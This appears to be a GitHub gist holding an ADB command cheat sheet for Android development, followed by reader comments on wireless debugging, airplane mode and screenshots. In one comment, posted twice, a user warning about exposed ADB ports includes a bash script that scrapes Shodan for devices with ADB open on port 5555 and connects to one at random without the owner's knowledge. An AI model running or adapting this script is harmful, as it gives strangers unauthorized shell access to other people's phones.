adb help // List all comands | |
== Adb Server | |
adb kill-server | |
adb start-server | |
== Adb Reboot | |
adb reboot | |
adb reboot recovery | |
adb reboot-bootloader | |
adb root //restarts adb with root permissions | |
== Shell | |
adb shell // Open or run commands in a terminal on the host Android device. | |
== Devices | |
adb usb | |
adb devices //show devices attached | |
adb devices -l //devices (product/model) | |
adb connect ip_address_of_device | |
== Get device android version | |
adb shell getprop ro.build.version.release | |
== LogCat | |
adb logcat | |
adb logcat -c // clear // The parameter -c will clear the current logs on the device. | |
adb logcat -d > [path_to_file] // Save the logcat output to a file on the local system. | |
adb bugreport > [path_to_file] // Will dump the whole device information like dumpstate, dumpsys and logcat output. | |
== Files | |
adb push [source] [destination] // Copy files from your computer to your phone. | |
adb pull [device file location] [local file location] // Copy files from your phone to your computer. | |
== App install | |
adb -e install path/to/app.apk | |
-d - directs command to the only connected USB device... | |
-e - directs command to the only running emulator... | |
-s <serial number> ... | |
-p <product name or path> ... | |
The flag you decide to use has to come before the actual adb command: | |
adb devices | tail -n +2 | cut -sf 1 | xargs -IX adb -s X install -r com.myAppPackage // Install the given app on all connected devices. | |
== Uninstalling app from device | |
adb uninstall com.myAppPackage | |
adb uninstall <app .apk name> | |
adb uninstall -k <app .apk name> -> "Uninstall .apk withour deleting data" | |
adb shell pm uninstall com.example.MyApp | |
adb shell pm clear [package] // Deletes all data associated with a package. | |
adb devices | tail -n +2 | cut -sf 1 | xargs -IX adb -s X uninstall com.myAppPackage //Uninstall the given app from all connected devices | |
== Update app | |
adb install -r yourApp.apk // -r means re-install the app and keep its data on the device. | |
adb install –k <.apk file path on computer> | |
== Home button | |
adb shell am start -W -c android.intent.category.HOME -a android.intent.action.MAIN | |
== Activity Manager | |
adb shell am start -a android.intent.action.VIEW | |
adb shell am broadcast -a 'my_action' | |
adb shell am start -a android.intent.action.CALL -d tel:+972527300294 // Make a call | |
// Open send sms screen with phone number and the message: | |
adb shell am start -a android.intent.action.SENDTO -d sms:+972527300294 --es sms_body "Test --ez exit_on_sent false | |
// Reset permissions | |
adb shell pm reset-permissions -p your.app.package | |
adb shell pm grant [packageName] [ Permission] // Grant a permission to an app. | |
adb shell pm revoke [packageName] [ Permission] // Revoke a permission from an app. | |
// Emulate device | |
adb shell wm size 2048x1536 | |
adb shell wm density 288 | |
// And reset to default | |
adb shell wm size reset | |
adb shell wm density reset | |
== Print text | |
adb shell input text 'Wow, it so cool feature' | |
== Screenshot | |
adb shell screencap -p /sdcard/screenshot.png | |
$ adb shell | |
shell@ $ screencap /sdcard/screen.png | |
shell@ $ exit | |
$ adb pull /sdcard/screen.png | |
--- | |
adb shell screenrecord /sdcard/NotAbleToLogin.mp4 | |
$ adb shell | |
shell@ $ screenrecord --verbose /sdcard/demo.mp4 | |
(press Control + C to stop) | |
shell@ $ exit | |
$ adb pull /sdcard/demo.mp4 | |
== Key event | |
adb shell input keyevent 3 // Home btn | |
adb shell input keyevent 4 // Back btn | |
adb shell input keyevent 5 // Call | |
adb shell input keyevent 6 // End call | |
adb shell input keyevent 26 // Turn Android device ON and OFF. It will toggle device to on/off status. | |
adb shell input keyevent 27 // Camera | |
adb shell input keyevent 64 // Open browser | |
adb shell input keyevent 66 // Enter | |
adb shell input keyevent 67 // Delete (backspace) | |
adb shell input keyevent 207 // Contacts | |
adb shell input keyevent 220 / 221 // Brightness down/up | |
adb shell input keyevent 277 / 278 /279 // Cut/Copy/Paste | |
0 --> "KEYCODE_0" | |
1 --> "KEYCODE_SOFT_LEFT" | |
2 --> "KEYCODE_SOFT_RIGHT" | |
3 --> "KEYCODE_HOME" | |
4 --> "KEYCODE_BACK" | |
5 --> "KEYCODE_CALL" | |
6 --> "KEYCODE_ENDCALL" | |
7 --> "KEYCODE_0" | |
8 --> "KEYCODE_1" | |
9 --> "KEYCODE_2" | |
10 --> "KEYCODE_3" | |
11 --> "KEYCODE_4" | |
12 --> "KEYCODE_5" | |
13 --> "KEYCODE_6" | |
14 --> "KEYCODE_7" | |
15 --> "KEYCODE_8" | |
16 --> "KEYCODE_9" | |
17 --> "KEYCODE_STAR" | |
18 --> "KEYCODE_POUND" | |
19 --> "KEYCODE_DPAD_UP" | |
20 --> "KEYCODE_DPAD_DOWN" | |
21 --> "KEYCODE_DPAD_LEFT" | |
22 --> "KEYCODE_DPAD_RIGHT" | |
23 --> "KEYCODE_DPAD_CENTER" | |
24 --> "KEYCODE_VOLUME_UP" | |
25 --> "KEYCODE_VOLUME_DOWN" | |
26 --> "KEYCODE_POWER" | |
27 --> "KEYCODE_CAMERA" | |
28 --> "KEYCODE_CLEAR" | |
29 --> "KEYCODE_A" | |
30 --> "KEYCODE_B" | |
31 --> "KEYCODE_C" | |
32 --> "KEYCODE_D" | |
33 --> "KEYCODE_E" | |
34 --> "KEYCODE_F" | |
35 --> "KEYCODE_G" | |
36 --> "KEYCODE_H" | |
37 --> "KEYCODE_I" | |
38 --> "KEYCODE_J" | |
39 --> "KEYCODE_K" | |
40 --> "KEYCODE_L" | |
41 --> "KEYCODE_M" | |
42 --> "KEYCODE_N" | |
43 --> "KEYCODE_O" | |
44 --> "KEYCODE_P" | |
45 --> "KEYCODE_Q" | |
46 --> "KEYCODE_R" | |
47 --> "KEYCODE_S" | |
48 --> "KEYCODE_T" | |
49 --> "KEYCODE_U" | |
50 --> "KEYCODE_V" | |
51 --> "KEYCODE_W" | |
52 --> "KEYCODE_X" | |
53 --> "KEYCODE_Y" | |
54 --> "KEYCODE_Z" | |
55 --> "KEYCODE_COMMA" | |
56 --> "KEYCODE_PERIOD" | |
57 --> "KEYCODE_ALT_LEFT" | |
58 --> "KEYCODE_ALT_RIGHT" | |
59 --> "KEYCODE_SHIFT_LEFT" | |
60 --> "KEYCODE_SHIFT_RIGHT" | |
61 --> "KEYCODE_TAB" | |
62 --> "KEYCODE_SPACE" | |
63 --> "KEYCODE_SYM" | |
64 --> "KEYCODE_EXPLORER" | |
65 --> "KEYCODE_ENVELOPE" | |
66 --> "KEYCODE_ENTER" | |
67 --> "KEYCODE_DEL" | |
68 --> "KEYCODE_GRAVE" | |
69 --> "KEYCODE_MINUS" | |
70 --> "KEYCODE_EQUALS" | |
71 --> "KEYCODE_LEFT_BRACKET" | |
72 --> "KEYCODE_RIGHT_BRACKET" | |
73 --> "KEYCODE_BACKSLASH" | |
74 --> "KEYCODE_SEMICOLON" | |
75 --> "KEYCODE_APOSTROPHE" | |
76 --> "KEYCODE_SLASH" | |
77 --> "KEYCODE_AT" | |
78 --> "KEYCODE_NUM" | |
79 --> "KEYCODE_HEADSETHOOK" | |
80 --> "KEYCODE_FOCUS" | |
81 --> "KEYCODE_PLUS" | |
82 --> "KEYCODE_MENU" | |
83 --> "KEYCODE_NOTIFICATION" | |
84 --> "KEYCODE_SEARCH" | |
85 --> "KEYCODE_MEDIA_PLAY_PAUSE" | |
86 --> "KEYCODE_MEDIA_STOP" | |
87 --> "KEYCODE_MEDIA_NEXT" | |
88 --> "KEYCODE_MEDIA_PREVIOUS" | |
89 --> "KEYCODE_MEDIA_REWIND" | |
90 --> "KEYCODE_MEDIA_FAST_FORWARD" | |
91 --> "KEYCODE_MUTE" | |
92 --> "KEYCODE_PAGE_UP" | |
93 --> "KEYCODE_PAGE_DOWN" | |
94 --> "KEYCODE_PICTSYMBOLS" | |
... | |
122 --> "KEYCODE_MOVE_HOME" | |
123 --> "KEYCODE_MOVE_END" | |
// https://developer.android.com/reference/android/view/KeyEvent.html | |
== ShPref | |
# replace org.example.app with your application id | |
# Add a value to default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key key_name --es value "hello world!"' | |
# Remove a value to default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.REMOVE --es key key_name' | |
# Clear all default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.CLEAR --es key key_name' | |
# It's also possible to specify shared preferences file. | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es name Game --es key level --ei value 10' | |
# Data types | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key string --es value "hello world!"' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key boolean --ez value true' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key float --ef value 3.14159' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key int --ei value 2015' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key long --el value 9223372036854775807' | |
# Restart application process after making changes | |
adb shell 'am broadcast -a org.example.app.sp.CLEAR --ez restart true' | |
== Monkey | |
adb shell monkey -p com.myAppPackage -v 10000 -s 100 // monkey tool is generating 10.000 random events on the real device | |
== Paths | |
/data/data/<package>/databases (app databases) | |
/data/data/<package>/shared_prefs/ (shared preferences) | |
/data/app (apk installed by user) | |
/system/app (pre-installed APK files) | |
/mmt/asec (encrypted apps) (App2SD) | |
/mmt/emmc (internal SD Card) | |
/mmt/adcard (external/Internal SD Card) | |
/mmt/adcard/external_sd (external SD Card) | |
adb shell ls (list directory contents) | |
adb shell ls -s (print size of each file) | |
adb shell ls -R (list subdirectories recursively) | |
== Device onformation | |
adb get-statе (print device state) | |
adb get-serialno (get the serial number) | |
adb shell dumpsys iphonesybinfo (get the IMEI) | |
adb shell netstat (list TCP connectivity) | |
adb shell pwd (print current working directory) | |
adb shell dumpsys battery (battery status) | |
adb shell pm list features (list phone features) | |
adb shell service list (list all services) | |
adb shell dumpsys activity <package>/<activity> (activity info) | |
adb shell ps (print process status) | |
adb shell wm size (displays the current screen resolution) | |
dumpsys window windows | grep -E 'mCurrentFocus|mFocusedApp' (print current app's opened activity) | |
== Package info | |
adb shell list packages (list package names) | |
adb shell list packages -r (list package name + path to apks) | |
adb shell list packages -3 (list third party package names) | |
adb shell list packages -s (list only system packages) | |
adb shell list packages -u (list package names + uninstalled) | |
adb shell dumpsys package packages (list info on all apps) | |
adb shell dump <name> (list info on one package) | |
adb shell path <package> (path to the apk file) | |
==Configure Settings Commands | |
adb shell dumpsys battery set level <n> (change the level from 0 to 100) | |
adb shell dumpsys battery set status<n> (change the level to unknown, charging, discharging, not charging or full) | |
adb shell dumpsys battery reset (reset the battery) | |
adb shell dumpsys battery set usb <n> (change the status of USB connection. ON or OFF) | |
adb shell wm size WxH (sets the resolution to WxH) | |
== Device Related Commands | |
adb reboot-recovery (reboot device into recovery mode) | |
adb reboot fastboot (reboot device into recovery mode) | |
adb shell screencap -p "/path/to/screenshot.png" (capture screenshot) | |
adb shell screenrecord "/path/to/record.mp4" (record device screen) | |
adb backup -apk -all -f backup.ab (backup settings and apps) | |
adb backup -apk -shared -all -f backup.ab (backup settings, apps and shared storage) | |
adb backup -apk -nosystem -all -f backup.ab (backup only non-system apps) | |
adb restore backup.ab (restore a previous backup) | |
adb shell am start|startservice|broadcast <INTENT>[<COMPONENT>] | |
-a <ACTION> e.g. android.intent.action.VIEW | |
-c <CATEGORY> e.g. android.intent.category.LAUNCHER (start activity intent) | |
adb shell am start -a android.intent.action.VIEW -d URL (open URL) | |
adb shell am start -t image/* -a android.intent.action.VIEW (opens gallery) | |
== Logs | |
adb logcat [options] [filter] [filter] (view device log) | |
adb bugreport (print bug reports) | |
== Other | |
adb backup // Create a full backup of your phone and save to the computer. | |
adb restore // Restore a backup to your phone. | |
adb sideload // Push and flash custom ROMs and zips from your computer. | |
fastboot devices | |
// Check connection and get basic information about devices connected to the computer. | |
// This is essentially the same command as adb devices from earlier. | |
//However, it works in the bootloader, which ADB does not. Handy for ensuring that you have properly established a connection. | |
-------------------------------------------------------------------------------- | |
Shared Preferences | |
# replace org.example.app with your application id | |
# Add a value to default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key key_name --es value "hello world!"' | |
# Remove a value to default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.REMOVE --es key key_name' | |
# Clear all default shared preferences. | |
adb shell 'am broadcast -a org.example.app.sp.CLEAR --es key key_name' | |
# It's also possible to specify shared preferences file. | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es name Game --es key level --ei value 10' | |
# Data types | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key string --es value "hello world!"' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key boolean --ez value true' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key float --ef value 3.14159' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key int --ei value 2015' | |
adb shell 'am broadcast -a org.example.app.sp.PUT --es key long --el value 9223372036854775807' | |
# Restart application process after making changes | |
adb shell 'am broadcast -a org.example.app.sp.CLEAR --ez restart true' | |
-------------------------------------------------------------------------------- | |
=== Few bash snippets === | |
@Source (https://jonfhancock.com/bash-your-way-to-better-android-development-1169bc3e0424) | |
=== Using tail -n | |
//Use tail to remove the first line. Actually two lines. The first one is just a newline. The second is “List of devices attached.” | |
$ adb devices | tail -n +2 | |
=== Using cut -sf | |
// Cut the last word and any white space off the end of each line. | |
$ adb devices | tail -n +2 | cut -sf -1 | |
=== Using xargs -I | |
// Given the -I option, xargs will perform an action for each line of text that we feed into it. | |
// We can give the line a variable name to use in commands that xargs can execute. | |
$ adb devices | tail -n +2 | cut -sf -1 | xargs -I X echo X aw yiss | |
=== Three options below together | |
// Will print android version of all connected devices | |
adb devices | tail -n +2 | cut -sf -1 | xargs -I X adb -s X shell getprop ro.build.version.release | |
=== Using alias | |
-- Example 1 | |
alias tellMeMore=echo | |
tellMeMore "hi there" | |
Output => hi there | |
-- Example 2 | |
// Define alias | |
alias apkinstall="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X install -r $1" | |
// And you can use it later | |
apkinstall ~/Downloads/MyAppRelease.apk // Install an apk on all devices | |
-- Example 3 | |
alias rmapp="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X uninstall $1" | |
rmapp com.example.myapp // Uninstall a package from all devices | |
-- Example 4 | |
alias clearapp="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X shell pm clear $1" | |
clearapp com.example.myapp // Clear data on all devices (leave installed) | |
-- Example 5 | |
alias startintent="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X shell am start $1" | |
startintent https://twitter.com/JonFHancock // Launch a deep link on all devices | |
Setting up your .bash_profile | |
Finally, to make this all reusable even after rebooting your computer (aliases only last through the current session), we have to add these to your .bash_profile. You might or might not already have a .bash_profile, so let’s make sure we append to it rather than overwriting it. Just open a terminal, and run the following command | |
touch .bash_profile && open .bash_profile | |
This will create it if it doesn’t already exist, and open it in a text editor either way. Now just copy and paste all of the aliases into it, save, and close. | |
alias startintent="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X shell am start $1" | |
alias apkinstall="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X install -r $1" | |
alias rmapp="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X uninstall $1" | |
alias clearapp="adb devices | tail -n +2 | cut -sf 1 | xargs -I X adb -s X shell pm clear $1" | |
=============================================================== | |
Sources: | |
- Internet | |
- https://www.automatetheplanet.com/adb-cheat-sheet/ |
@Basu-max likely not with the
adb
binary. I could imagine a scenario where you wrote a console program that proxies through toadb
but only supported a restricted list of functions...
Thanks for the reply.
Right. Specially I was wondering if it is possible to configure the ADB demon to remove/disable modules that remove/disable specific CMDs. This would prevent a proxy program.
Objective is to secure ADB by restricting to a pre configured ADM CMD list.
Adding a proxy program to mask CMDs while ADB present would not meet the objective.
adb
would, indeed, not meet the objective. In fact, you'll need developer mode turned on at the device to even connect, so this may not be the solution you are looking for.
Depending on the nature of the command, you could also remove / disable the command while you are in the system through adb
. It is a linux system, after all.
Just wanted to share this command to force-stop all user installed apps:
If you're running from within the emulator
pm list packages -3 | awk -F "package:" '{print $2}' | xargs -n1 am force-stop
If you're running via adb:
adb shell pm list packages -3 | awk -F "package:" '{print $2}' | xargs -n1 adb shell am force-stop
Hello, Is there any command that adds a google account?
Hi, I was wondering if anyone knows command do disable "Raise to wake" option on Redmi 9. I disabled it in settings but it still keep waking up as soon as I lift it. It's killing me. Thanks
Thanks, I doing adb module for python with this
Thanks, I doing adb module for python with this
@MrDjBird hi, could you pl be little more specific about it, I didn't get actually what exactly about python / adb module
How to use &
in adb shell input text 'asdas&'
?
I am trying to insert a text which contains &
. But it is not working.
Note:
%
, $
, #
, '@' etc. special characters are working well except ^
, &
characters in text value for adb input.
Hi, I was wondering if anyone knows the command do disable auto update the app
Hi, I was wondering if anyone knows the command do disable auto update the app
Package wise
adb shell pm disable-user –user 0 <package_name>
Stop auto-update for all apps
adb shell pm disable-user com.android.vending
How to use
&
inadb shell input text 'asdas&'
? I am trying to insert a text which contains&
. But it is not working. Note:%
,$
,#
, '@' etc. special characters are working well except^
,&
characters in text value for adb input.
adb shell input text 'foo\&'
adb shell input text 'foo\^'
adb shell input text 'foo\&^'
adb shell input text 'foo\&\^'
adb shell echo Hello "\&" World
adb shell echo Hello \& World
On Older Devices the below command probably works fine as well
adb shell input keyevent KEYCODE_AMPERSAND
Yeh but... how do you connect to Android shell as it doesn't give name as IP address when you do adb devices so you can't just use that right? Can't find that information but I was doing it before?
You need to connect to your device via adb connect
adb connect <ip>:<port>
First you need to enable tcp mode as below with usb cable connected
- Plugin USB and execute
adb tcpip 5555
- Remove USB Cable and connect to your device via network:
adb connect <ip>:5555
- Now you can work with your device via network, enter shell as usual:
adb shell
⚠ WARNING: *Don't forget toDISCONNECT
when you have finished debugging.
You can be in danger and may be listed at shodan.io and other sites similiar to shodan if you will keep tcpip be running in background. We can find your device via a simple portscan via masscan or similiar tools, so use below command when you are done in shell:
adb disconnect
To show you the danger with keep tcp mode running, for more tips to stay safe you can visit the below url for get latest commands since some are out of date I see here:
https://wuseman.github.io/adb-cheatsheet/
- You can copy and paste in any terminal and you are connected to a random device that has tcpip running without device owners knowledge, there is no way to figure out wihtout list connected devices ON the device. Therefore, take my warning seriously! Within ~1-3 seconds you have connected to a device.
Now imagine if we use xargs -n1 -P20, then we connect to 20 device at same time. So be careful!!
# Port for ABD
PORT="5555"
# Shodan FILTER:
FILTER="android+debug+bridge"
# Source URL:
TARGETS="https://www.shodan.io/search?query=${FILTER}"
function findTargets() {
curl -sL ${TARGETS}|awk '!seen[$0]++' \
|grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" \
|awk '!seen[$0]++' |tee wadb-attack.log
}
function adbConnect() {
grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" wadb-attack.log \
|sed 's/$/:5555/g'|tee target.txt
shuf -n1 target.txt \
|xargs adb connect
}
findTargets
adbConnect
Above script is shared for educational purposes, wuseman cannot be held responsible for other users' use of the above script
// wuseman
You need to connect to your device via
adb connect
adb connect <ip>:<port>First you need to enable tcp mode as below with usb cable connected
- Plugin USB and execute
adb tcpip 5555
- Remove USB Cable and connect to your device via network:
adb connect <ip>:5555
- Now you can work with your device via network, enter shell as usual:
adb shell
⚠ WARNING: *Don't forget toDISCONNECT
when you have finished debugging.
You can be in danger and may be listed at shodan.io and other sites similiar to shodan if you will keep tcpip be running in background. We can find your device via a simple portscan via masscan or similiar tools, so use below command when you are done in shell:adb disconnectTo show you the danger with keep tcp mode running, for more tips to stay safe you can visit the below url for get latest commands since some are out of date I see here:
https://wuseman.github.io/adb-cheatsheet/
- You can copy and paste in any terminal and you are connected to a random device that has tcpip running without device owners knowledge, there is no way to figure outwihtout list connected devices ON the device. Therefore, take my warning seriously! Within ~1-3 seconds you have connected to a device.
Now imagine if we use xargs -n1 -P20, then we connect to 20 device at same time. So be careful!!
# Port for ABD PORT="5555" # Shodan FILTER: FILTER="android+debug+bridge" # Source URL: TARGETS="https://www.shodan.io/search?query=${FILTER}" function findTargets() { curl -sL ${TARGETS}|awk '!seen[$0]++' \ |grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" \ |awk '!seen[$0]++' |tee wadb-attack.log } function adbConnect() { grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" wadb-attack.log \ |sed 's/$/:5555/g'|tee target.txt shuf -n1 target.txt \ |xargs adb connect } findTargets adbConnectAbove script is shared for educational purposes, wuseman cannot be held responsible for other users' use of the below script
// wuseman
Wow thank you so much! I was using adb shell but i'll keep disconnect in mind for protection (I do put my laptop to sleep and can keep shell open for a long time so it's good to know the dangers..)
Hi, How can I turn on airplane mode using adb commands !!
I had tried many commands, but it actually only changing the icon, it is not turning off radio signal !!
Hi, How can I turn on airplane mode using adb commands !! I had tried many commands, but it actually only changing the icon, it is not turning off radio signal !!
Hi.
Interesting find.
Does the icon become brighter than usual when you use the command via adb in notification center for airplane_mode @muhammedbasilek ?
Hi, How can I turn on airplane mode using adb commands !! I had tried many commands, but it actually only changing the icon, it is not turning off radio signal !!
Hi.
Interesting find.
Does the icon become brighter than usual when you use the command via adb in notification center for airplane_mode @muhammedbasilek ?
No, it slightly dim when it turns on.
Hi again, I finally I figured this out, please try:
Get airplane mode
adb shell cmd connectivity airplane-mode
disabled
Turn airplane mode enable/disable
adb shell cmd connectivity airplane-mode enable
adb shell cmd connectivity airplane-mode disable
Sorry it is still not working !!
Tested on OnePlus10T 5G.
Sorry it is still not working !! Tested on OnePlus10T 5G.
You must provide a little more information otherwise it is difficult to help.
- Did:
adb shell cmd connectivity airplane-mode
- work or did you get any error message?
If command was
adb shell cmd connectivity airplane-mode enable
..If the command was
adb shell cmd connectivity airplane-mode
Was the value changed in shell
?
-
- Which Android version do you have installed?
@wuseman
Sorry it is still not working !! Tested on OnePlus10T 5G.You must provide a little more information otherwise it is difficult to help.
- Did:
adb shell cmd connectivity airplane-mode
- work or did you get any error message?If command was OK did you try:
adb shell cmd connectivity airplane-mode enable
..If the command was valid
adb shell cmd connectivity airplane-modeWas the value changed in
shell
?
- Which Android version do you have installed?
Hi,
Thank you so much for the effort.
Actually it is working now. Used above command.
adb shell cmd connectivity airplane-mode enable
Thanks again !!
Cool, I thought it was a bit strange otherwise.
You welcome, cheers :)
Occasionally screencap stops working, producing a 0 filesize png file instead of one with data.
Right now the only way I can resolve this is by rebooting the device, but wondering if it's possible to restart this screencap service via adb shell somehow?
Occasionally screencap stops working, producing a 0 filesize png file instead of one with data. Right now the only way I can resolve this is by rebooting the device, but wondering if it's possible to restart this screencap service via adb shell somehow?
What command are you using when you using screencap and it gives you a 0 byte file?
adb shell screencap > screen.png
I’ve got a loop that fires that command once per second.
Works at first but after a few minutes of my script running the screen captures start coming in broken.
Ok, I just tried and it seems to works fine for one capture at least.
Try this inside your script:
adb exec-out screencap -p > screen.png
I see, if you would show us your script or the function for your screencap we probably can give you better support.
You want to take a screencap every second or what are you trying when it wont take captures anymore?
You running this in a while loop without delay?
I'm doing this in a while loop with a half-second delay. It will work for a few minutes and then ultimately the image file is corrupted and my script crashes, so I force a reboot on the device.
while run:
try:
loop += 1
print('loop count ', loop)
#save image to memory
im_b64 = device1.exec_out('screencap -p | base64')
im_bytes = base64.b64decode(im_b64)
im_file = BytesIO(im_bytes)
image = Image.open(im_file)
# crop image
image1 = image.crop((1520, 860, 1920, 980)) # left top right bottom
im = numpy.asarray(image1)
# extract text from image
text = pytesseract.image_to_string(im)
print(text)
if "Skip" in text:
device1.shell('input tap 1640 950')
print("Skip clicked!")
logging.info("Commercial Skipped")
if loop > 1800:
# each loop is about 1s so 1800 is 30 minutes
run = False
logging.info("Skipper stopping after 30 minutes")
time.sleep(0.5)
except Exception as e:
print(e)
run = False
logging.error('App Crashed: ' + e)
# error with android device, reboot to fix
device1.reboot()
@Basu-max likely not with the
adb
binary. I could imagine a scenario where you wrote a console program that proxies through toadb
but only supported a restricted list of functions...